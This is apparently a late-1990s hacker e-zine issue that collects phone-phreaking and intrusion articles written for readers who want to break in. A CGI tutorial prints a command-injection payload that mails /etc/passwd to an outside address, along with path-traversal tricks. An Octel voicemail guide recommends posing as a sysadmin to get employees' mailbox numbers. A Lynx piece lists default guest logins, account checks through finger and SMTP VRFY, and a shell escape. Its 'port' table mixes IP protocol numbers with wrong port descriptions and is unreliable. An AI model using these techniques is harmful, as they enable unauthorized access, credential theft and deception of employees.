__| | : : |_|\_\ \__/ |____| : """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" INTRODUCTION ------------ I always wished, and always will that I would have the pleasure to own all the bell equipment. And so I decided that I would make a checklist of all the equipment that I knew of, well then the thought came to mind, I bet every- one else would enjoy it do. So here is a dictionary of all Bell equip that I know of, if I missed something find me on dal.net in #npa, #phreaks, or where- ever I am. DICTIONARY ---------- Bell 11mm, 3/8= A single driver, an 11mm on one end and a 3/8 on the opposite Bell Blue= Scematic blue prints of a specific areas' wiring system Bell Emitter= A box that emits signals for the Bell Wireless Tester, it is a tester, for the tester. Bell Hard-Hat= Ummm... let me think... Bell Hex= An allen wrench that has a hole drilled in the center. Bell Lap= A piece of crap with a 1200 kbps and shit mem. Contains Bell 800 bbs #'s and other useless programs. Bell Tester= Uses light too represent voltages, 10-12, 0, 48, etc.. Has modular and clips. Bell Thing= A large steel piece of equip which conects pieces of plastic holding copper wires in the center (between the 2 plastic things) ___________________________ | | |***************************| |___________________________| (cont..) there by keeping the wires with there group & reducing "Jumbbled Up" wiring. Bell Wirerless Tester: Uses tones to represent voltage. DRACON: A Bell linemans hand set with attached Beige. Some dracons contain 4 extra buttons, rcl, snd, ect... Name recived due to the fact that they are made by the Harris Dracon Co. ___ FILE WROTE BY: Kosmos, for, |\ | | \ |\ AMD FOR EVERYONE THAT WISHES TO | \ | |___/ |_\ LEARN. | \| | | \ REMEMBER, if I left somthing out, no matter what it is, find me and tell me. Advanced CGI Exploitation Techniques By: IsolationX Common Gateway Interface (cgi) is a type of scripting language. Cgi is not its "own" language, it is a combination of perl, C, and shell commands. Cgi scripts are normaly stored in the /cgi-bin/ directory, this directory is exacutable via http. When there is not a /cgi-bin/ directory it is normaly due to the admin changing the location of where the scripts are held or the server does not support cgi. Cgi is commenly used for webpages but it can be used for many more types of things. Since cgi is very commen it will, of course, produce major security flaws. These flaws are normaly do to a amature scripter who knows very little about cgi and the security aspects of it. Thus I have decided to write a indepth artical on cgi security and the ways to exploit it. Lets begin. Lets say you stumble onto Ms. Marry's webpage and it contains the following form... <form action = "www.site.com/cgi-bin/form1.pl" method="get"> <input type="hidden" name="myaddress" value="marry@site.com"> <input type = "text" name=input> <input type = "submit" value="Send comment"> </form> This is a simple form that asks the user to input a message, which is sent to a script called form1.pl. Lets say that in the source of this script contains the following line (assume that the variables have already been parsed out of the input stream).... system("/usr/lib/sendmail -t $myaddress < $tempfile") This puts what the user has entered into a temp file, then e-mails it to Ms. Marry. Consider what you can do with this script. Here is one way you could do exploit it http... <form action = "www.site.com/cgi-bin/form1.pl" method="get"> <input type="hidden" name="myaddress" value=" ; mail -s passwd-file hacker@host.com < /etc/passwd;"> <input type = "text" name=input> <input type = "submit" value="Get the passwd file"> </form> I have just demenstrated a 'system call hole'. The "system" call in perl, spawns a Unix shell and, in this case, exacutes the commands in the 'value' field, mailing the passwd file to hacker@host.com. Just for refernece, the semicolons in the 'hidden value' field act as delimiters, which separate the commands. Any cgi system call is inherently exploitable if not correctly coded (which it rearely is). Consider the following line of code within a cgi script... print `/usr/local/bin/finger $userinput`; This could be taken advantage of by using the same type of maliciuos input as before. In genral if any of the following characters are included in a system call it is most likely exploitable in some means. ; > < & * ` | $ # Anyway, enough on system calls, lets move on. Opening a file on a system remotely is always a plus for the hacker, so let me show you a quick example of how to get read access to a most any file on a system by exploiting a small script. Say that you are writing a script that stores a message based on the username of the user entering it, and you add the following line to your script... open(FILE,"> /usr/local/message/data/$username"); Well what if the user was to type in ../../../../etc/passwd as his username? You would, ofcourse, get read access to /etc/passwd. Simple enough but very affective, need I say more...? A good trick to know off hand is to subvert the systems variables to point to a trojan horse in another directory. Here is a quick and pretty straight forward line of code that is volnurable to this type of atack... system("finger $untained_user"); Now I have been talking about the code for the cgi scripts and you are probaly thinking well how the hell am I going to get the code for custom scripts in the first placeLets say that Mr. Johnson just wrote a cgi script in EMACS or a simamler type of editor. Well when you write cgi scipt in one of those types of editors it automaticaly creates a backup of the file with the extention of ~. Now that you know this (I hope you did know this before now) you can sometimes stuble apon the source of custom cgi scripts and check them for voulnerbilitys. Before I go let me say, allways watch for scripts that query a file on the remote system... It can be used to view files on that system (e.x. /etx/passwd or /etc/shadow). A example of this is the infamouse 'phf' bug. Anyway Keep it together. Be Cool, IsolationX D. Operating Guide For Octel Voice Mail Systems -------------------------------------------- Written By: De-Format Ok... lots of companys use Octel as thier voice mail OS... and it's pretty basic to operate. But there's some things within Octel that aren't well known of. This file was written mainly for people who are just experimenting in the voice mail field, or who wish to persue into it, and are just starting. However, some "veteran" VMB hackers may wish to read this also, it's all you really need to know about Octel. Table Of Contents ----------------- 1) How you know you have an Octel VMB system. 2) The complete list of Octel commands. 3) Further explanation of selected Octel options. 4) General tips. 5) How you can reach Octel. 1) How you know you have an Octel VMB system. --------------------------------------------- Most companys only put up there 1-800 VMB system after work hours, but sometimes you'll get lucky and come across an automated system thats up 24 hours a day. So you call the 1-800 number, once you hear the greeting, press the # key. If you get some bitchy voice saying "Please Enter Your Mailbox Number", then you've probably got an Octel. (You'll recognize the voice from other places) Now it's all upto you. There's a million and one ways you can get someone's mailbox number and sometimes even their password. Phone up during business hours and get connected to some company worker, tell them your the sysadmin and tell them the voice mail system had some sort of crash, or start asking them question about the company and tell them you want to leave them a message. (Get their box and your all set, you just have to hope they have a default pw, or you can scan a bunch of nums until you find some un-used boxes). 2) The complete list of Octel commands. --------------------------------------- ============================================================================== Phone the 1-800 number. Get the intro prompt. Press #. Enter mailbox number. Enter password. ============================================================================== Check unheard messages press 11. Review saved messages press 1. Send a message press 2. Check receipt press 3. Personal options press 4. Restart press 5. Exit press *. ============================================================================== If you pressed 1 you go on to these options while listening to the message(s). Position: Rewind-1, Pause/Restart-2, Fast Forward-3. Speed: Slower-4, Envelope-5, Faster-6. Volume: Normal-8, Louder-9. To cancel press *. For help press 0. To skip press #. ============================================================================== After the message you have these options. To replay press 4. For the envelope press 5. To forward a copy to another destination press 6. To erase the message press 7. To reply to the message, press 8. To save the message, press 9. To return to the main menu press *. ============================================================================== If you pressed 2 you go onto these options after you recorded your message. To reply the message, press 1. If you are finished recording, press #. Enter the destination of the message, or spell a name by pressing #. ============================================================================== Once your destination is entered, you have these extra options. To mark the message private press 1. To mark the message urgent press 2. For message recieved confirmation, press 3. Future delivery press 4. ============================================================================== Even more options after the ones directly above include. To send, press #. No more destinations, press *. To confirm receipt, press 1. To notify of non-receipt, press 2. ============================================================================== If you press 3 you go onto this option. Enter mailbox number or press # to spell the name. ============================================================================== If you press 4 you get these personal options. To turn notification ON/OFF press 1. For administrative options, press 2. For greetings press 3. Notification schedule, press 4. Mailbox forwarding, press 5. Security options press 6. ============================================================================== If you pressed 2 at the personal options menu, you will be at the admin menu. Passwords press 1. Group lists press 2. Prompt levels press 3. Date & time playback, press 4. ============================================================================== If you press 1 at the admin options, these are your options. Guest 1 (mailbox 91) press 1. Guest 2 (mailbox 92) press 2. Home (mailbox 93) press 3. Secretary press 4. Personal press 5. ============================================================================== If you press 2 at the admin options, these are your options. Create a group list, press 1. Edit a group list, press 2. Delete a group list, press 3. List names, press 4. ============================================================================== If you press 3 at the admin options, these are your options. Standard prompt levels, press 1. Extended prompt levels, press 2. Rapid prompt levels, press 3. ============================================================================== If you press 3 at the personal options menu, these are your options. Personal greeting, press 1. Exteneded absence, press 2 Name, press 3. ============================================================================== If you press 4 at the personal options menu, these are your options. 1st schedule notification, press 1. 2nd schedule notification, press 2. Temporary notification, press 3. ============================================================================== If you press 5 at the personal options menu, these are your options. To establish or change forwarding destination, press 1. To cancel forwarding destination, press 2. ============================================================================== If you press 6 at the personal options menu, these are your options. To turn on access security press 1. To turn off access security press 2. To hear the tutorial press 0. ============================================================================== 3) Further explanation of selected Octel commands. -------------------------------------------------- Envelope Information: When your listening to a message, or after it ends, you can obtain envelope info. If the message sender is a subscriber, you can hear the sender's name. (If the person is not on the Octel system you'll be told the message was left by an outside caller.) You'll also be told of the time and date the message was sent at, how long it is and whether it's urgent and/or private. If your listening to an archived (saved) message, the time refers to when the message was archived, or sent... it all depends on how the system is set up. If you get envelope info during the message, the message will continue where you left off when the envelope info is done. ============================================================================== Passwords: Your password can be up to 15 digits long. The sysadmin (whose account you may be able to acquire) decides on the minimal digits for a password. Passwords must be different on all your boxes. (Example... if your password was 5555 then your password on one of your guest boxes can't be 5555) If you want to find out the current password being used on a box, press 0 immediately after you identify the type of password to be changed. You can have two guest passwords, and therefore two guest mailboxes, as you already knew. You can give a guest mailbox to someone who doesn't have a legit box but you keep in touch with a lot. (You also have control over the guest box so, well, if at some time you want to break the lines of communication that the person of the guest mailbox uses, you can) Guests can only hear messages that you send them. Thats not fair is it? If you change the password on a guest mailbox, all messages still in the box are erased. Not even the system administrator can get your password. If you forgot it, then your pretyt much screwed cause you have to have your mailbox reset and well, if you go asking he's going to wonder where in the world you came from. If you give someone a guest password they must call the system telephone number, press #, enter your mailbox number and enter the password that allows entry into his/her portion of your mailbox. ============================================================================== Group Distribution Lists: Group lists are ok to have if you "obtain" a large number of boxes on the system and decide to be nice and give them to friends, otherwise this option is just plain useless. ============================================================================== Notification Schedule: The notification schedule is kinda cool. You can have the system call you at any specified time frame once you recieve messages. You can even set up different time schedules for different portions of the week/night/day. Depending on where you live, the system may/may not be able to call you, it's whatever the sysadmin set it at, but if you can get his/her account, then your set. ============================================================================== Access Security: This option is nice to have, but if you have the IQ of a watermelon you won't need it. This option is somewhat a pain in the ass also. You have to record your name and time of day. Next time you logon it will tell you who was last on. (If the name isn't your's then you might want to sit down and think long and hard about the positive aspects of watermelons). If you hear silence for the name and time, or the following prompt: "The last mailbox access was by recorded name and time skipped." then you just might want to change your password to something a watermelon couldn't guess, because if you do hear that then chances are someone was in on your account. ============================================================================== 4) General tips. ---------------- - If your placing a call to the system with a AT&T calling card/calling card number, then be sure not to hit # too quickly. This may indicate to AT&T that you want to place another calling card call. Wait until the system's intro prompt is done. You can also press * to enter the system as a subscriber. - Thats about the only tip there is... everything else should be fine. 5) How you can reach Octel. --------------------------- On the phone: 1-800-87-OCTEL Snail Mail: Octel Communications Corporation 1001 Murphy Ranch Road Milpitas, California USA 95035-7912 On the web: www.octel.com E. My unix port hand book Unix Ports by (\/)@ster Y0d@ Decimal Keyword Protocol ------- ------- -------- 0 Reserved 1 ICMP Internet Control Message 2 IGMP Internet Group Management 3 GGP Gateway-to-Gateway 4 IP IP in IP (encasulation) 5 ST Stream 6 TCP Transmission Control 7 UCL UCL 8 EGP Exterior Gateway Protocol 9 IGP any private interior gateway 10 BBN-RCC-MON BBN RCC Monitoring 11 NVP-II Gives you info on all the users in the system 12 PUP PUP 13 ARGUS Daytime and date a location 14 EMCON EMCON 15 XNET Cross Net Debugger 16 CHAOS Chaos 17 UDP User Datagram 18 MUX Multiplexing 19 DCN-MEAS DCN Measurement Subsystems 20 HMP Host Monitoring 21 PRM Transfer files 22 XNS-IDP XEROX NS IDP 23 TRUNK-1 Telnet login 24 TRUNK-2 Trunk-2 25 LEAF-1 Send mail port 26 LEAF-2 Leaf-2 27 RDP Reliable Data Protocol 28 IRTP Internet Reliable Transaction 29 ISO-TP4 ISO Transport Protocol Class 4 30 NETBLT Bulk Data Transfer Protocol 31 MFE-NSP MFE Network Services Protocol 32 MERIT-INP MERIT Internodal Protocol 33 SEP Sequential Exchange Protocol 34 3PC Third Party Connect Protocol 35 IDPR Inter-Domain Policy Routing Protocol 36 XTP XTP 37 DDP Datagram Delivery Protocol,Time! 38 IDPR-CMTP IDPR Control Message Transport Proto 39 TP++ TP++ Transport Protocol ,Resouce Location too 40 IL IL Transport Protocol 41 SIP Simple Internet Protocol 42 SDRP Source Demand Routing Protocol 43 SIP-SR Info on hosts and networks 44 SIP-FRAG SIP Fragment 45 IDRP Inter-Domain Routing Protocol 46 RSVP Reservation Protocol 47 GRE General Routing Encapsulation 48 MHRP Mobile Host Routing Protocol 49 BNA BNA 50 SIPP-ESP SIPP Encap Security Payload 51 SIPP-AH SIPP Authentication Header 52 I-NLSP Integrated Net Layer Security 53 SWIPE IP with Encryption , Also Name Server 54 NHRP NBMA Next Hop Resolution Protocol 55-60 Unassigned 61 any host internal protocol 62 CFTP CFTP 63 any local network 64 SAT-EXPAK SATNET and Backroom EXPAK 65 KRYPTOLAN Kryptolan 66 RVD MIT Remote Virtual Disk Protocol 67 IPPC Internet Pluribus Packet Core 68 any distributed file system 69 SAT-MON SATNET Monitoring 70 GOPHER VISA Protocol ,Out of Date info hunter 71 IPCV Internet Packet Core Utility 72 CPNX Computer Protocol Network Executive 73 CPHB Computer Protocol Heart Beat 74 WSN Wang Span Network 75 PVP Packet Video Protocol 76 BR-SAT-MON Backroom SATNET Monitoring 77 SUN-ND SUN ND PROTOCOL-Temporary 78 WB-MON WIDEBAND Monitoring 79 WB-EXPAK WIDEBAND EXPAK, lots of info on users 80 ISO-IP ISO Internet Protocol, web server 81 VMTP VMTP 82 SECURE-VMTP SECURE-VMTP 83 VINES VINES 84 TTP TTP 85 NSFNET-IGP NSFNET-IGP 86 DGP Dissimilar Gateway Protocol 87 TCF TCF 88 IGRP IGRP 89 OSPFIGP OSPFIGP 90 Sprite-RPC Sprite RPC Protocol 91 LARP Locus Address Resolution Protocol 92 MTP Multicast Transport Protocol 93 AX.25 AX.25 Frames 94 IPIP IP-within-IP Encapsulation Protocol 95 MICP Mobile Internetworking Control Pro. 96 SCC-SP Semaphore Communications Sec. Pro. 97 ETHERIP Ethernet-within-IP Encapsulation 98 ENCAP Encapsulation Header 99 any private encryption scheme 100 GMTP GMTP 110 POP Incoming E-mail 111-254 Unassigned 255 Reserved 443 SHTP Another web server 512 BIFF Mail Notification 513 RLOGIN Remote login 520 ROUTE Routing information protocol The port information is this file is derived from the RFC standards. If you liked this file send your comments to mastyoda@concentric.net if you hated this and though it was stupid send it to my dev/null. The info in the text is very useful to any hacker, elite of not, everyone needs to port surf. Port Surfers will lover me for doing this. (\/)@ster Y0d@ F. ------[ Using a Guest Lynx Account to Your Advantage]---------------- ******************* by Electric Nectar***************** ---------- Situation: ---------- Ok so you're trying to get a valid account on a server for whatever reasons. (busting root, taking a look around, etc.) You've tried telneting to port 79, 25, and got a couple valid accounts, and have tried hopelessly to just guess the passwords. This is not the approach to take. ----------------- Method of attack: ----------------- Throughout my experience, while trying to gain a valid account on various servers, I've run into many that run a guest lynx account. The purpose of this account is just what it sounds like, it gives no access to the server itself, but rather let's you only run lynx (a unix-based, text only, web browser). The account is designed to be accessed by outsiders. The most common lynx login's and passwords are: -lynx/lynx -guest/guest -guest/lynx -www/wwww -www/lynx Ok well I think you get the idea, be creative if one doesn's work. First off though, you need to make sure the account exists. Simply telnet to port 79, and try typing in a possible lynx account name. If it varifies it your set. Now if 79 isn't open, just telnet to port 25, and type 'vrfy username'; username being the name of a guest lynx account. This too will varify the account. Here's an example... Finger: Trying... Connected to host.com Escape character is '^]'. lynx Login name: lynx In real life: Lynx Guest Account Directory: /home/lynx Shell: /usr/bin/lynx No Plan. Smtp: Trying... Connected to host.com Escape character is '^]'. 220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 - 0400 vrfy lynx 252 <lynx@host.com> ------------------- After varification: ------------------- Now remember, a lynx guest account isn't a common thing on most servers, although I have seen it on quite a few. This is just an alternate plan of getting a shell on an otherwise, unaccessable server, if the situation exists. If you cannot validate a guest lynx account, don't be surprised. Next order of business is to login of course. It should be fairly simple. Since it is a guest lynx account, the login and password should be somewhat obvious, usually the password is the same as the login.... $ telnet host.com Trying... Connected to host.com Escape character is '^]'. Linux 2.0.29 (host.com) (ttyp0) Welcome to Linux 2.0.29. host login: lynx Password: Linux 2.0.29. Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com You have new mail. --------------- Once logged in: --------------- Ok, your terminal should look something like this... ---------------------------------------------------------------------- Lynx (default page crap here) _________________________________________________________________ -- press space for next page -- Arrow keys: Up and Down to move. Right to follow a link; Left to go back. H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list ----------------------------------------------------------------------------- Now the following trick is something I developed after several minutes of devising a plan to make lynx pop me into a bash shell. Now that you are in lynx, hit 'O' for the options menu. Ok the options menu should come up, let's take a look at it... ----------------------------------------------------------------------------- Options Menu (Lynx Version 2.6) E)ditor : NONE D)ISPLAY variable : NONE B)ookmark file : lynx_bookmarks.html F)TP sort criteria : By Filename P)ersonal mail address : NONE S)earching type : CASE INSENSITIVE display (C)haracter set : ISO Latin 1 Raw 8-bit or CJK m(O)de : ON preferred document lan(G)uage: en preferred document c(H)arset : NONE V)I keys : OFF e(M)acs keys : OFF K)eypad mode : Numbers act as arrows li(N)e edit style : Default Binding l(I)st directory style : Mixed style sho(W) dot files : OFF U)ser mode : Novice user (A)gent : Lynx/2.6 libwww-FM/2.14 Select capital letter of option line, '>' to save, or 'r' to return to Lynx. ----------------------------------------------------------------------------- Notice the E)ditor option. That's what we're after. The purpose of it is to edit the file currently open in lynx with the supplied text editor. Lynx usually expects you to put in something like joe, pico, vi, etc. But we can supply anything we want, and it will use it with the syntax: [editor] <file open in lynx> Ok, here's where we get inovative. Hit 'E' to type in an editor. For the editor, type: exec. Ah yes, those of experience are now starting to nod their heads. Now hit 'shift+period key' or '>' to save the options. You now return to the default screen. Next step. Hit 'g'. You will be prompted to enter a URL. For the URL put the following: file://localhost/bin/sh If all goes according to plan, /bin/sh will open as binary garbage in lynx. Now, normally if you hit 'e' with a default text editor set in the options menu, it would edit /bin/sh as a text file. But thanks to our little exec fix, it will now exec /bin/sh. And we all know what that does: pops us into a bash shell! Here's an example of the act in progress... ----------------------------------------------------------------------------- ELF4≡?4 (444 ╘╘╘ΘΘΘyy╠H¼[─1─┴─┴/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST eP{ut!i:@%`Mb9Aq7>=.~ZGFY/<Ccrz'*w,]RhO6X?(4 p\Jf2- v^}1#k;lK_V3$E0nyID╕"╪C&─┴± /XY5Tpµ <xΣN╕"T╚<["bH3kyu├xP~X"¿¬Φ&(═íH"⌐÷├¼╚"▓ Φ"╣°ß┴`º ╟╪8╬⌠┐± Σ8 Θ°├∞╕g≤°<√X" X┬ⁿ├$├4╕6:hA"HxcO@V<ⁿ- \#e╪"kcs8╣{y ñí (""╚"íh"⌐╕B░H&╖(J┴╦8&╒¿"┌¿"Σ¿Mεh"·°"""h Φ&%HM/h"48"9¿╫?XE<M╕"Y(C"`&"j├ v"~Φf"hc\┬ ╚"í8"⌐X"▒"╢"╜╕"├"╟°"╠"╙x"╪X"Γ"Ωx"∩"⌡" ·°"Φ"H"╚"8""#¿"-╚"5H"?("D>O⌠├]╪Pc╕┬Toh"w"~╚&"`┬TΦ("X& Φ$½H@│ ├T╛h"┼°"╠╪"╘&"█°"Σ ("φ╪G"÷╪b²xWx<"x<¿╠(F*l0j98tBK\┬R├_Tº± fT┬± mT┬± y4╒± libtermcap.so.2strcpyioct ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype _toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp -- press space for next page -- Arrow keys: Up and Down to move. Right to follow a link; Left to go back. bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list ----------------------------------------------------------------------------- If you look in the very bottom left corner you will see it! (bash$) A simple 'clear' command will get rid of the rest of that mess. Often times the TERM setting will be all messed up. Simply fix that by typing: TERM=vt100 export TERM And there you have it folks, a bash shell popped off of a lynx guest account. Now feel free to look around, run a few exploits, whatever, what you do beyond here is totally up to you. Hope you enjoyed today's little lesson, and I hope you get a chance to put it to work sometime. Take it easy all. ---------[End]--------------------------------------------------------------- ---------------------------------------------------------------------- URL OF THE MONTH BBM.DYN.ML.ORG Title: The Blue Box Moon Author: Delphian Q The Blue Box Moon, What a glorious Site. Not only does this site provide A WEALTH of Information but it has something to fit everyone. I have spoken to the author of this page who is a very Moral and Respectable person. Delphain is a person That is to be respected at all times, so if you ever see him on IRC please dont fuck with him. this section is especially dedicated to him. Thank you for all the help you have provided DelphianQ. SKaLaR109 NPA/97 Closing Ceremonies _________________________________ Well thats it for this one. I'd like to say thanks to all who wrote, helped or annoyed me. Just like to say thanks to SKaLaR109 for not killing me for being so late with this, and Aardwolf for reminding me to get this thing done. So... __ _ _______ __ /| \ /| | /| _____ | /| \ | | \| | | | | |___/ | | | \ | | |\ \ | | | | _____/ | | |\ \ | | | \ \| | | | |___/ | | _ \ | | |\ \ | | | | | | | \ \ | |_| \ \__| | |_| | |_|\ \__\ |/__/ \/__/ |/__/ |/__/ \/__/